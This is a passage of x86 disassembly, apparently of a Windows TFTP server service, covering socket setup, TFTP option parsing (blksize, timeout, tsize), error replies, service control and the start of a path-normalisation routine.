call dword_10010F8 ; WSAGetLastError
jmp loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C34: ; CODE XREF: sub_1001A91+129�j
; sub_1001A91+196�j
push 0
push dword_1005DDC
call dword_100103C ; WaitForSingleObject
test eax, eax
jz loc_1001D2F
cmp dword ptr [edi], 2
jl loc_1001CEA
xor edi, edi
cmp [esp+70h+arg_FFA8], edi
jz short loc_1001CDA
mov ax, [ebp+0]
push eax
call dword_1001104 ; ntohs
movzx ecx, ax
test ecx, ecx
jle short loc_1001CB8
cmp ecx, 2
jle short loc_1001C81
cmp ecx, 4
jz short loc_1001CB8
cmp ecx, 5
jnz short loc_1001CB8
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C81: ; CODE XREF: sub_1001A91+1E2�j
cmp ax, 1
jnz short loc_1001C94
inc dword_10060C4
mov edi, offset sub_1002F31
jmp short loc_1001CA5
; ---------------------------------------------------------------------------
loc_1001C94: ; CODE XREF: sub_1001A91+1F4�j
cmp ax, 2
jnz short loc_1001CA5
inc dword_10060C8
mov edi, offset sub_100333A
loc_1001CA5: ; CODE XREF: sub_1001A91+201�j
; sub_1001A91+207�j
mov eax, [esp+74h+arg_FFA0]
test edi, edi
mov [esi+8], eax
jz short loc_1001CEA
push esi
call edi ; sub_1002F31
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CB8: ; CODE XREF: sub_1001A91+1DD�j
; sub_1001A91+1E7�j ...
push 0
push 4
push [esp+7Ch+arg_FFA0]
inc dword_10060CC
lea eax, [esp+80h+var_20]
push eax
lea eax, [esp+84h+var_30]
push eax
call sub_100230A
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CDA: ; CODE XREF: sub_1001A91+1CB�j
mov eax, [esp+70h+arg_FFA4]
push esi
mov [esi+8], eax
call sub_1002EC8
loc_1001CEA: ; CODE XREF: sub_1001A91+19E�j
; sub_1001A91+1BC�j ...
push ebx
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1006078
mov dword ptr [esi+4], offset dword_1006078
mov [esi], eax
push offset dword_1005DE8
mov [eax+4], esi
mov dword_1006078, esi
call dword_100105C ; InterlockedIncrement
dec dword_1005DF4
push ebx
call dword_100104C ; RtlLeaveCriticalSection
xor ebp, ebp
jmp loc_1001AAA
; ---------------------------------------------------------------------------
loc_1001D27: ; CODE XREF: sub_1001A91+32�j
call dword_10010F8 ; WSAGetLastError
jmp short loc_1001D65
; ---------------------------------------------------------------------------
loc_1001D2F: ; CODE XREF: sub_1001A91+136�j
; sub_1001A91+161�j ...
push ebx
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1006078
mov dword ptr [esi+4], offset dword_1006078
mov [esi], eax
push offset dword_1005DE8
mov [eax+4], esi
mov dword_1006078, esi
call dword_100105C ; InterlockedIncrement
dec dword_1005DF4
loc_1001D5E: ; CODE XREF: sub_1001A91+9D�j
push ebx
call dword_100104C ; RtlLeaveCriticalSection
loc_1001D65: ; CODE XREF: sub_1001A91+3C�j
; sub_1001A91+29C�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 10004h
retn 8
sub_1001A91 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_1001D74: ; DATA XREF: sub_100188E+2D�o
push ecx
push ebx
push ebp
push esi
mov esi, offset dword_1006020
push edi
mov edi, dword_1001070
push esi
xor ebp, ebp
xor ebx, ebx
call edi ; dword_1001070
loc_1001D8B: ; CODE XREF: seg000:01001DA1�j
test eax, eax
jnz short loc_1001DA7
push 0C8h
call dword_100106C ; Sleep
push esi
call edi ; dword_1001070
inc ebx
cmp ebx, 7Dh
jb short loc_1001D8B
test eax, eax
jz short loc_1001DD1
loc_1001DA7: ; CODE XREF: seg000:01001D8D�j
lea eax, [esp+10h]
push eax
push dword ptr [esp+1Ch]
call sub_10021E5
test eax, eax
jnz short loc_1001DC0
mov eax, [esp+10h]
mov ebp, [eax+0Ch]
loc_1001DC0: ; CODE XREF: seg000:01001DB7�j
push esi
call dword_100104C ; RtlLeaveCriticalSection
push ebp
push dword ptr [esp+1Ch]
call sub_1001A91
loc_1001DD1: ; CODE XREF: seg000:01001DA5�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1001DDB: ; DATA XREF: sub_100188E:loc_10018C2�o
push 0
push dword ptr [esp+8]
call sub_1001A91
xor eax, eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001DEB proc near ; DATA XREF: sub_1001665+6�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
call dword_10010A4 ; time
inc dword_1006134
pop ecx
lea eax, [ebp+var_4]
push eax
call dword_10010B8 ; ctime
mov eax, [ebp+arg_0]
pop ecx
dec eax
jz short loc_1001E68
dec eax
jz short loc_1001E35
dec eax
jz short loc_1001E1D
dec eax
dec eax
jz short loc_1001E68
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E1D: ; CODE XREF: sub_1001DEB+2A�j
push dword_1006040
call dword_1001034 ; ResumeThread
mov dword_1006124, 4
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E35: ; CODE XREF: sub_1001DEB+27�j
push dword_1006040
call dword_1001074 ; SuspendThread
mov dword_1006124, 7
loc_1001E4B: ; CODE XREF: sub_1001DEB+30�j
; sub_1001DEB+48�j
push offset dword_1006120
push dword_1006044
call dword_1001014 ; SetServiceStatus
test eax, eax
jnz short locret_1001E6F
call dword_1001038 ; RtlGetLastWin32Error
jmp short locret_1001E6F
; ---------------------------------------------------------------------------
loc_1001E68: ; CODE XREF: sub_1001DEB+24�j
; sub_1001DEB+2E�j
push 0
call sub_1001E73
locret_1001E6F: ; CODE XREF: sub_1001DEB+73�j
; sub_1001DEB+7B�j
leave
retn 4
sub_1001DEB endp
; =============== S U B R O U T I N E =======================================
sub_1001E73 proc near ; CODE XREF: sub_1001665+B9�p
; sub_1001DEB+7F�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, dword_1001014
push edi
mov edi, offset dword_1006120
push edi
mov dword_1006124, 3
push dword_1006044
call esi ; dword_1001014
mov ebp, dword_1001038
xor ebx, ebx
cmp eax, ebx
jnz short loc_1001EA3
call ebp ; dword_1001038
loc_1001EA3: ; CODE XREF: sub_1001E73+2C�j
push dword_1005DDC
call dword_1001030 ; SetEvent
mov dword_1006124, 1
mov dword_1006134, ebx
mov eax, [esp+10h+arg_0]
mov dword_1006138, ebx
cmp eax, ebx
jnz short loc_1001EDB
mov dword_100612C, ebx
mov dword_1006130, ebx
jmp short loc_1001EFD
; ---------------------------------------------------------------------------
loc_1001EDB: ; CODE XREF: sub_1001E73+58�j
cmp eax, 834h
jb short loc_1001EF3
cmp eax, 16A7h
mov dword_100612C, 42Ah
jbe short loc_1001EF8
loc_1001EF3: ; CODE XREF: sub_1001E73+6D�j
mov dword_100612C, eax
loc_1001EF8: ; CODE XREF: sub_1001E73+7E�j
mov dword_1006130, eax
loc_1001EFD: ; CODE XREF: sub_1001E73+66�j
push edi
push dword_1006044
call esi ; dword_1001014
cmp eax, ebx
jnz short loc_1001F0C
call ebp ; dword_1001038
loc_1001F0C: ; CODE XREF: sub_1001E73+95�j
mov eax, dword_1005DE0
mov esi, dword_1001054
cmp eax, ebx
jz short loc_1001F24
push eax
call esi ; dword_1001054
mov dword_1005DE0, ebx
loc_1001F24: ; CODE XREF: sub_1001E73+A6�j
mov eax, dword_1005DDC
cmp eax, ebx
jz short loc_1001F36
push eax
call esi ; dword_1001054
mov dword_1005DDC, ebx
loc_1001F36: ; CODE XREF: sub_1001E73+B8�j
mov eax, dword_1005DD0
cmp eax, ebx
jz short loc_1001F4D
push eax
call dword_100109C ; fclose
pop ecx
mov dword_1005DD0, ebx
loc_1001F4D: ; CODE XREF: sub_1001E73+CA�j
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_1001E73 endp
; =============== S U B R O U T I N E =======================================
sub_1001F54 proc near ; CODE XREF: sub_1002182+1C�p
; sub_1002219+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0FFFFFFFFh
push dword ptr [esi+10h]
call dword_1001168 ; RtlDeregisterWaitEx
push dword ptr [esi+8]
call dword_100111C ; closesocket
push dword ptr [esi+14h]
call dword_1001118 ; WSACloseEvent
mov eax, [esi]
mov ecx, [esi+4]
cmp eax, ecx
jnz short loc_1001F90
mov eax, dword_1006038
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
jmp short loc_1001F9A
; ---------------------------------------------------------------------------
loc_1001F90: ; CODE XREF: sub_1001F54+29�j
mov [ecx], eax
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
loc_1001F9A: ; CODE XREF: sub_1001F54+3A�j
push esi
call dword_10010A0 ; free
pop ecx
pop esi
retn 4
sub_1001F54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001FA6 proc near ; CODE XREF: sub_10018DB+3D�p
; sub_1002219+1D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_4]
push edi
push eax
push edi
mov [ebp+var_4], edi
mov [ebp+var_8], 0C0000017h
mov [ebx], edi
call sub_1003A4A ; GetIpAddrTable
cmp eax, edi
jz short loc_1001FD3
cmp eax, 7Ah
jnz short loc_100201A
loc_1001FD3: ; CODE XREF: sub_1001FA6+26�j
push [ebp+var_4]
call dword_1001094 ; malloc
mov esi, eax
pop ecx
cmp esi, edi
jz short loc_100201A
loc_1001FE3: ; CODE XREF: sub_1001FA6+63�j
lea eax, [ebp+var_4]
push edi
push eax
push esi
call sub_1003A4A ; GetIpAddrTable
cmp eax, edi
jz short loc_1002015
cmp eax, 7Ah
jnz short loc_100201A
push [ebp+var_4]
push esi
call dword_1001098 ; realloc
pop ecx
cmp eax, edi
pop ecx
jz short loc_100200B
mov esi, eax
jmp short loc_1001FE3
; ---------------------------------------------------------------------------
loc_100200B: ; CODE XREF: sub_1001FA6+5F�j
push esi
call dword_10010A0 ; free
pop ecx
jmp short loc_100201A
; ---------------------------------------------------------------------------
loc_1002015: ; CODE XREF: sub_1001FA6+4A�j
mov [ebp+var_8], edi
mov [ebx], esi
loc_100201A: ; CODE XREF: sub_1001FA6+2B�j
; sub_1001FA6+3B�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn 4
sub_1001FA6 endp
; =============== S U B R O U T I N E =======================================
sub_1002024 proc near ; CODE XREF: sub_100205A+B7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_0]
call dword_1001120 ; inet_ntoa
test eax, eax
jz short locret_1002057
push edi
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push esi
mov eax, ecx
mov esi, edi
mov edi, [esp+8+arg_4]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
pop edi
locret_1002057: ; CODE XREF: sub_1002024+C�j
retn 8
sub_1002024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100205A proc near ; CODE XREF: sub_10018DB+64�p
; sub_1002219+65�p ...
var_28 = byte ptr -28h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_4], esi
loc_1002068: ; CODE XREF: sub_100205A+5D�j
push 1
push esi
push esi
push esi
push 2
push 2
call dword_10010F4 ; WSASocketA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_100209D
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push offset aUdp ; "udp"
push offset aTftp ; "tftp"
stosd
call dword_1001128 ; getservbyname
cmp eax, esi
jnz short loc_10020B9
jmp short loc_10020B1
; ---------------------------------------------------------------------------
loc_100209D: ; CODE XREF: sub_100205A+22�j
call dword_10010F8 ; WSAGetLastError
push 2EEh
call dword_100106C ; Sleep
inc [ebp+var_4]
loc_10020B1: ; CODE XREF: sub_100205A+41�j
cmp [ebp+var_4], 0Ah
jge short loc_10020E6
jmp short loc_1002068
; ---------------------------------------------------------------------------
loc_10020B9: ; CODE XREF: sub_100205A+3F�j
mov [ebp+var_14], 2
mov ax, [eax+8]
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_14]
push 10h
push eax
push ebx
call dword_1001124 ; bind
test eax, eax
jz short loc_10020E6
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100215E
; ---------------------------------------------------------------------------
loc_10020E6: ; CODE XREF: sub_100205A+5B�j
; sub_100205A+82�j
cmp ebx, 0FFFFFFFFh
jz short loc_100215E
push 20h
call dword_1001094 ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_100213D
push 8
xor eax, eax
pop ecx
mov edi, esi
rep stosd
mov eax, [ebp+arg_0]
lea ecx, [ebp+var_28]
push ecx
push eax
mov [esi+8], ebx
mov [esi+0Ch], eax
call sub_1002024
xor eax, eax
push eax
push eax
push eax
push eax
call dword_1001040 ; CreateEventA
mov edi, eax
test edi, edi
jz short loc_1002140
push 1
push edi
push ebx
mov [esi+14h], edi
call sub_100188E
test eax, eax
mov [esi+10h], eax
jnz short loc_1002162
jmp short loc_1002140
; ---------------------------------------------------------------------------
loc_100213D: ; CODE XREF: sub_100205A+9E�j
mov edi, [ebp+arg_0]
loc_1002140: ; CODE XREF: sub_100205A+CC�j
; sub_100205A+E1�j
push ebx
call dword_100111C ; closesocket
test edi, edi
jz short loc_1002152
push edi
call dword_1001054 ; CloseHandle
loc_1002152: ; CODE XREF: sub_100205A+EF�j
test esi, esi
jz short loc_100215E
push esi
call dword_10010A0 ; free
pop ecx
loc_100215E: ; CODE XREF: sub_100205A+8A�j
; sub_100205A+8F�j ...
xor eax, eax
jmp short loc_100217B
; ---------------------------------------------------------------------------
loc_1002162: ; CODE XREF: sub_100205A+DF�j
mov eax, dword_1006038
mov dword ptr [esi+4], offset dword_1006038
mov [esi], eax
mov [eax+4], esi
mov dword_1006038, esi
mov eax, esi
loc_100217B: ; CODE XREF: sub_100205A+106�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_100205A endp
; =============== S U B R O U T I N E =======================================
sub_1002182 proc near ; CODE XREF: sub_1002219:loc_1002298�p
mov ecx, dword_1006038
push esi
mov esi, offset dword_1006038
xor eax, eax
cmp ecx, esi
jz short loc_10021B3
push edi
loc_1002195: ; CODE XREF: sub_1002182+2E�j
cmp dword ptr [ecx+18h], 0
mov edi, [ecx]
jnz short loc_10021A8
push ecx
call sub_1001F54
push 1
pop eax
jmp short loc_10021AC
; ---------------------------------------------------------------------------
loc_10021A8: ; CODE XREF: sub_1002182+19�j
and dword ptr [ecx+18h], 0
loc_10021AC: ; CODE XREF: sub_1002182+24�j
cmp edi, esi
mov ecx, edi
jnz short loc_1002195
pop edi
loc_10021B3: ; CODE XREF: sub_1002182+10�j
pop esi
retn
sub_1002182 endp
; =============== S U B R O U T I N E =======================================
sub_10021B5 proc near ; CODE XREF: sub_1002219+43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset dword_1006038
and dword ptr [edx], 0
mov eax, dword_1006038
loc_10021C7: ; CODE XREF: sub_10021B5+21�j
cmp eax, ecx
jz short loc_10021DF
mov esi, [eax+0Ch]
cmp esi, [esp+4+arg_0]
jz short loc_10021D8
mov eax, [eax]
jmp short loc_10021C7
; ---------------------------------------------------------------------------
loc_10021D8: ; CODE XREF: sub_10021B5+1D�j
push 1
mov [edx], eax
pop eax
jmp short loc_10021E1
; ---------------------------------------------------------------------------
loc_10021DF: ; CODE XREF: sub_10021B5+14�j
xor eax, eax
loc_10021E1: ; CODE XREF: sub_10021B5+28�j
pop esi
retn 8
sub_10021B5 endp
; =============== S U B R O U T I N E =======================================
sub_10021E5 proc near ; CODE XREF: seg000:01001DB0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset dword_1006038
and dword ptr [edx], 0
mov eax, dword_1006038
loc_10021F7: ; CODE XREF: sub_10021E5+21�j
cmp eax, ecx
jz short loc_100220A
mov esi, [eax+8]
cmp esi, [esp+4+arg_0]
jz short loc_1002208
mov eax, [eax]
jmp short loc_10021F7
; ---------------------------------------------------------------------------
loc_1002208: ; CODE XREF: sub_10021E5+1D�j
mov [edx], eax
loc_100220A: ; CODE XREF: sub_10021E5+14�j
mov eax, [edx]
pop esi
neg eax
sbb eax, eax
and al, 0A9h
add eax, 57h
retn 8
sub_10021E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002219 proc near ; DATA XREF: sub_10018DB+CB�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor esi, esi
push offset dword_1006020
mov [ebp+var_C], esi
call dword_1001058 ; RtlEnterCriticalSection
lea eax, [ebp+var_4]
push eax
call sub_1001FA6
test eax, eax
jnz short loc_10022A9
mov eax, [ebp+var_4]
xor ebx, ebx
cmp [eax], esi
jbe short loc_1002298
loc_1002248: ; CODE XREF: sub_1002219+7D�j
mov eax, [eax+esi+4]
test eax, eax
jz short loc_100228D
cmp eax, 100007Fh
jz short loc_100228D
lea ecx, [ebp+var_8]
push ecx
push eax
call sub_10021B5
test eax, eax
jz short loc_1002271
mov eax, [ebp+var_8]
mov dword ptr [eax+18h], 1
jmp short loc_100228D
; ---------------------------------------------------------------------------
loc_1002271: ; CODE XREF: sub_1002219+4A�j
mov eax, [ebp+var_4]
push 1
pop edi
push dword ptr [eax+esi+4]
mov [ebp+var_C], edi
call sub_100205A
test eax, eax
mov [ebp+var_8], eax
jz short loc_100228D
mov [eax+18h], edi
loc_100228D: ; CODE XREF: sub_1002219+35�j
; sub_1002219+3C�j ...
mov eax, [ebp+var_4]
inc ebx
add esi, 18h
cmp ebx, [eax]
jb short loc_1002248
loc_1002298: ; CODE XREF: sub_1002219+2D�j
call sub_1002182
push [ebp+var_4]
mov esi, eax
call dword_10010A0 ; free
pop ecx
loc_10022A9: ; CODE XREF: sub_1002219+24�j
cmp [ebp+var_C], 0
jnz short loc_10022E9
test esi, esi
jnz short loc_10022E9
mov eax, dword_1006038
mov edi, offset dword_1006038
cmp eax, edi
jz short loc_10022E9
loc_10022C1: ; CODE XREF: sub_1002219+CE�j
mov [ebp+var_8], eax
mov ebx, [eax]
test byte ptr [eax+1Ch], 1
jnz short loc_10022E3
mov esi, [eax+0Ch]
push eax
call sub_1001F54
push esi
call sub_100205A
test eax, eax
jz short loc_10022E3
or dword ptr [eax+1Ch], 1
loc_10022E3: ; CODE XREF: sub_1002219+B1�j
; sub_1002219+C4�j
cmp ebx, edi
mov eax, ebx
jnz short loc_10022C1
loc_10022E9: ; CODE XREF: sub_1002219+94�j
; sub_1002219+98�j ...
push offset dword_1006100
push offset dword_1005E00
call sub_1003A44 ; NotifyAddrChange
push offset dword_1006020
call dword_100104C ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002219 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100230A proc near ; CODE XREF: sub_1001A91+242�p
; sub_10023D8+23C�p ...
var_FFBC = word ptr -0FFBCh
var_FFBA = word ptr -0FFBAh
var_FFB8 = byte ptr -0FFB8h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 0FFBCh
call sub_1003A3E ; _chkstk
push ebx
push esi
mov esi, dword_1001104
push edi
push 5
call esi ; dword_1001104
mov edi, [ebp+arg_C]
mov [ebp+var_FFBC], ax
push edi
call esi ; dword_1001104
cmp [ebp+arg_10], 0
mov [ebp+var_FFBA], ax
jz short loc_1002369
mov edi, [ebp+arg_10]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [ebp+var_FFB8]
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+arg_10]
jmp short loc_10023A2
; ---------------------------------------------------------------------------
loc_1002369: ; CODE XREF: sub_100230A+32�j
cmp di, 9
jb short loc_1002371
xor edi, edi
loc_1002371: ; CODE XREF: sub_100230A+63�j
movzx eax, di
or ecx, 0FFFFFFFFh
lea ebx, [ebp+var_FFB8]
mov edx, off_1005CC0[eax*4]
xor eax, eax
mov edi, edx
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, edx
loc_10023A2: ; CODE XREF: sub_100230A+5D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
push 10h
push [ebp+arg_0]
not ecx
dec ecx
push eax
add ecx, 5
lea eax, [ebp+var_FFBC]
push ecx
push eax
push [ebp+arg_8]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_10023D1
call dword_10010F8 ; WSAGetLastError
loc_10023D1: ; CODE XREF: sub_100230A+BF�j
pop edi
pop esi
pop ebx
leave
retn 14h
sub_100230A endp
; =============== S U B R O U T I N E =======================================
sub_10023D8 proc near ; CODE XREF: sub_1002F31+302�p
; sub_100333A+26D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_0]
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_10]
mov dword ptr [eax+20h], 200h
mov dword ptr [eax+28h], 0Ah
mov eax, [esp+0Ch+arg_14]
push edi
mov ecx, 3FEFh
and dword ptr [eax], 0
xor eax, eax
mov edi, esi
push 6
rep stosd
call dword_1001104 ; ntohs
mov [esi], ax
lea ebx, [esi+2]
mov ebp, [esp+10h+arg_4]
cmp byte ptr [ebp+0], 0
jz loc_10025E4
loc_1002420: ; CODE XREF: sub_10023D8+202�j
mov esi, dword_100115C
push offset aBlksize ; "blksize"
push ebp
call esi ; dword_100115C
pop ecx
test eax, eax
pop ecx
jnz short loc_1002498
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
push 8
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
add ebp, esi
add ebx, esi
push ebp
call dword_1001160 ; atoi
pop ecx
cmp eax, esi
mov ecx, [esp+10h+arg_0]
mov [ecx+20h], eax
jb loc_10025FD
cmp eax, 0FFB8h
ja loc_10025FD
cmp eax, 5B0h
jnz short loc_100248F
mov dword ptr [ecx+20h], 200h
sub ebx, esi
jmp loc_10025C6
; ---------------------------------------------------------------------------
loc_100248F: ; CODE XREF: sub_10023D8+A7�j
push 0Ah
push ebx
push eax
jmp loc_1002597
; ---------------------------------------------------------------------------
loc_1002498: ; CODE XREF: sub_10023D8+5A�j
push offset aTimeout_0 ; "timeout"
push ebp
call esi ; dword_100115C
pop ecx
test eax, eax
pop ecx
jnz short loc_100251A
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
add ebp, 8
mov eax, ecx
mov esi, edi
mov edi, ebx
push ebp
shr ecx, 2
rep movsd
mov ecx, eax
add ebx, 8
and ecx, 3
rep movsb
call dword_1001160 ; atoi
pop ecx
mov ecx, [esp+10h+arg_0]
push 1
pop edx
cmp eax, edx
mov [ecx+28h], eax
jl loc_1002602
cmp eax, 0FFh
jg loc_1002602
mov eax, [esp+10h+arg_14]
mov edi, ebp
or ecx, 0FFFFFFFFh
mov [eax], edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebp
jmp loc_10025A2
; ---------------------------------------------------------------------------
loc_100251A: ; CODE XREF: sub_10023D8+CC�j
push offset aTsize ; "tsize"
push ebp
call esi ; dword_100115C
pop ecx
mov edi, ebp
test eax, eax
pop ecx
jnz loc_10025B2
or edx, 0FFFFFFFFh
xor eax, eax
mov ecx, edx
add ebp, 6
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
add ebx, 6
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
cmp [esp+10h+arg_8], 2
rep movsb
jnz short loc_100258D
mov edi, ebp
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebp
mov ecx, edx
repne scasb
not ecx
dec ecx
mov edi, ebp
lea ebx, [ebx+ecx+1]
mov ecx, edx
jmp short loc_10025CB
; ---------------------------------------------------------------------------
loc_100258D: ; CODE XREF: sub_10023D8+180�j
mov eax, [esp+10h+arg_0]
push 0Ah
push ebx
push dword ptr [eax+24h]
loc_1002597: ; CODE XREF: sub_10023D8+BB�j
call dword_1001164 ; _itoa
add esp, 0Ch
mov edi, ebx
loc_10025A2: ; CODE XREF: sub_10023D8+13D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
lea ebx, [ebx+ecx+1]
jmp short loc_10025C6
; ---------------------------------------------------------------------------
loc_10025B2: ; CODE XREF: sub_10023D8+150�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jz short loc_10025E0
loc_10025C6: ; CODE XREF: sub_10023D8+B2�j
; sub_10023D8+1D8�j
mov edi, ebp
or ecx, 0FFFFFFFFh
loc_10025CB: ; CODE XREF: sub_10023D8+1B3�j
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jnz loc_1002420
loc_10025E0: ; CODE XREF: sub_10023D8+1EC�j
mov esi, [esp+10h+arg_10]
loc_10025E4: ; CODE XREF: sub_10023D8+42�j
mov eax, [esp+10h+arg_C]
sub ebx, esi
cmp ebx, 2
mov [eax], ebx
jnz short loc_10025F4
and dword ptr [eax], 0
loc_10025F4: ; CODE XREF: sub_10023D8+217�j
xor eax, eax
loc_10025F6: ; CODE XREF: sub_10023D8+244�j
pop edi
pop esi
pop ebp
pop ebx
retn 18h
; ---------------------------------------------------------------------------
loc_10025FD: ; CODE XREF: sub_10023D8+91�j
; sub_10023D8+9C�j
push 0
push esi
jmp short loc_1002606
; ---------------------------------------------------------------------------
loc_1002602: ; CODE XREF: sub_10023D8+105�j
; sub_10023D8+110�j
push 0
push 8
loc_1002606: ; CODE XREF: sub_10023D8+228�j
push dword ptr [ecx+8]
lea eax, [ecx+0FFF1h]
add ecx, 0Ch
push eax
push ecx
call sub_100230A
or eax, 0FFFFFFFFh
jmp short loc_10025F6
sub_10023D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100261E proc near ; CODE XREF: sub_1002F31+130�p
; sub_100333A+150�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov al, [ebx]
mov ecx, ebx
mov esi, ebx
mov [ebp+arg_0], ebx
loc_1002630: ; CODE XREF: sub_100261E+22�j
test al, al
jz short loc_1002642
cmp al, 5Ch
jz short loc_100263C
cmp al, 2Fh
jnz short loc_1002642
loc_100263C: ; CODE XREF: sub_100261E+18�j
mov al, [ecx+1]
inc ecx
jmp short loc_1002630
; ---------------------------------------------------------------------------
loc_1002642: ; CODE XREF: sub_100261E+14�j
; sub_100261E+1C�j ...
mov al, [ecx]
test al, al
jz loc_10026E4
cmp al, 2Eh
jnz loc_100271C
mov dl, [ecx+1]
lea edi, [ecx+1]
cmp dl, 5Ch
jz loc_1002718
cmp dl, 2Fh
jz loc_1002718
cmp dl, al
jnz loc_1002703
mov dl, [ecx+2]
lea edi, [ecx+2]
cmp dl, 5Ch
jz short loc_1002684
cmp dl, 2Fh
jnz short loc_1002703
loc_1002684: ; CODE XREF: sub_100261E+5F�j
dec esi
mov ecx, edi
dec esi
cmp esi, ebx
jbe short loc_10026E0
loc_100268C: ; CODE XREF: sub_100261E+7B�j
mov al, [esi]
cmp al, 5Ch
jz short loc_100269B
cmp al, 2Fh
jz short loc_100269B
dec esi
cmp esi, ebx
jnb short loc_100268C
loc_100269B: ; CODE XREF: sub_100261E+72�j
; sub_100261E+76�j
inc esi
loc_100269C: ; CODE XREF: sub_100261E+8E�j
; sub_100261E+EE�j ...
cmp esi, [ebp+arg_0]
jbe short loc_10026AE
cmp byte ptr [esi-1], 20h
lea eax, [esi-1]
jnz short loc_10026AE
mov esi, eax
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_10026AE: ; CODE XREF: sub_100261E+81�j
; sub_100261E+8A�j
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026B8
cmp al, 2Fh
jnz short loc_1002642
loc_10026B8: ; CODE XREF: sub_100261E+94�j
cmp esi, ebx
jz short loc_10026CB
mov al, [esi-1]
cmp al, 5Ch
jz short loc_10026CB
